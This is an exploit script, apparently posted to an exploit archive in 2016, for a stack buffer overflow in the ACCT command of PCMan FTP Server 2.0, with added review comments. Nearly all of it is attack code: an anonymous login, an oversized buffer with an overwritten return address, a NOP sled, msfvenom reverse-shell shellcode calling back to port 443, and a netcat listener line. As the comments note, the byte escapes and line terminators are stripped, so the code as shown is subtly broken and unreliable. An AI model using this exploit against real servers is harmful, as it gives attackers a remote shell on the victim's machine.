PCMan FTP Server 2.0 ACCT Buffer Overflow
Posted on 05 November 2016
#!/usr/bin/env python
#-*- coding: utf-8 -*-
# Exploit Title: PCMan FTP Server 2.0 ACCT Command Buffer Overflow Exploit
# Date: 3/11/2016
# Exploit Author: Cybernetic
# Version: 2.0
# Tested on: Windows XP Profesional SP3 ESP x86
# CVE : N/A
"""Proof-of-concept for a stack buffer overflow in the ACCT command of PCMan FTP Server 2.0.

Flow: open a TCP connection to a hard-coded host on port 21, log in as
``anonymous``/``anonymous``, then send one ACCT command whose argument is an
oversized, fixed-layout buffer (filler, overwritten return address, NOP sled,
shellcode, trailing padding).

NOTE(review): as preserved on this page the hex-escape backslashes in every
byte literal are missing (e.g. the ``ret`` literal reads as eight ASCII
characters while its comment names a 4-byte address), and the CRLF
terminators of the FTP commands are gone too, so the literal strings below are
plain text and the length arithmetic in the comments describes the author's
intended layout, not what this text would actually send.

Python 2 syntax (``print`` statement); ``os`` and ``sys`` are imported but
never used.
"""

import socket, os, sys

# Return-address overwrite. The comment names an address inside Shell32.dll
# (0x7E6B31C7) written little-endian; the author tested on XP SP3 x86.
ret="xC7x31x6Bx7E" #Shell32.dll 7E6B31C7

#Metasploit Shellcode
#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b 'x00x0ax0d' -f c
#nc -lvp 443
#Send exploit

# Generator-emitted payload (see the msfvenom line above): a reverse shell
# calling back to the LHOST/LPORT used at generation time, encoded to avoid
# NUL, LF and CR. Adjacent string literals concatenate at parse time.
shellcode=("xbaxacx84x20xa3xdaxc7xd9x74x24xf4x5fx2bxc9xb1"
"x52x31x57x12x83xc7x04x03xfbx8axc2x56xffx7bx80"
"x99xffx7bxe5x10x1ax4ax25x46x6fxfdx95x0cx3dxf2"
"x5ex40xd5x81x13x4dxdax22x99xabxd5xb3xb2x88x74"
"x30xc9xdcx56x09x02x11x97x4ex7fxd8xc5x07x0bx4f"
"xf9x2cx41x4cx72x7ex47xd4x67x37x66xf5x36x43x31"
"xd5xb9x80x49x5cxa1xc5x74x16x5ax3dx02xa9x8ax0f"
"xebx06xf3xbfx1ex56x34x07xc1x2dx4cx7bx7cx36x8b"
"x01x5axb3x0fxa1x29x63xebx53xfdxf2x78x5fx4ax70"
"x26x7cx4dx55x5dx78xc6x58xb1x08x9cx7ex15x50x46"
"x1ex0cx3cx29x1fx4ex9fx96x85x05x32xc2xb7x44x5b"
"x27xfax76x9bx2fx8dx05xa9xf0x25x81x81x79xe0x56"
"xe5x53x54xc8x18x5cxa5xc1xdex08xf5x79xf6x30x9e"
"x79xf7xe4x31x29x57x57xf2x99x17x07x9axf3x97x78"
"xbaxfcx7dx11x51x07x16xdex0ex06xa1xb6x4cx08x2c"
"xfcxd8xeex44x12x8dxb9xf0x8bx94x31x60x53x03x3c"
"xa2xdfxa0xc1x6dx28xccxd1x1axd8x9bx8bx8dxe7x31"
"xa3x52x75xdex33x1cx66x49x64x49x58x80xe0x67xc3"
"x3ax16x7ax95x05x92xa1x66x8bx1bx27xd2xafx0bxf1"
"xdbxebx7fxadx8dxa5x29x0bx64x04x83xc5xdbxcex43"
"x93x17xd1x15x9cx7dxa7xf9x2dx28xfex06x81xbcxf6"
"x7fxffx5cxf8xaaxbbx6dxb3xf6xeaxe5x1ax63xafx6b"
"x9dx5execx95x1ex6ax8dx61x3ex1fx88x2exf8xccxe0"
"x3fx6dxf2x57x3fxa4")

# 30-byte NOP sled in front of the shellcode so an imprecise landing still
# slides into it.
shell= 'x90'*30 + shellcode

# Intended layout of the ACCT argument (assuming intact byte escapes):
#   2007 bytes of 'A' filler  -> reaches the saved return address
#   4 bytes  ret              -> overwritten return address
#   shell + 'C' padding       -> always 696 bytes in total
# i.e. a 2707-byte argument. Detection note: a legitimate ACCT argument is an
# account name; a command argument of this size on port 21 is itself a strong
# signal, independent of payload content. (`buffer` shadows a Python 2 builtin.)
buffer='x41'*2007+ ret + shell + 'x43'*(696-len(shell))

print "Sending Buffer"

# Target host/port are hard-coded; there is no timeout or error handling, so a
# refused or hung connection raises/blocks here. socket.connect() returns None,
# so `connect` is never meaningful and is unused.
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(('10.10.1.10',21))
s.recv(1024)
s.send('USER anonymous ')
s.recv(1024)
s.send('PASS anonymous ')
s.recv(1024)
# The overflow is triggered by the ACCT command, post-authentication as
# anonymous: on a server that allows anonymous login no credentials are needed.
s.send('ACCT' +buffer+ ' ')
s.close()
# Printed unconditionally after the send; nothing here verifies success.
print "Attack Buffer Overflow Successfully Executed"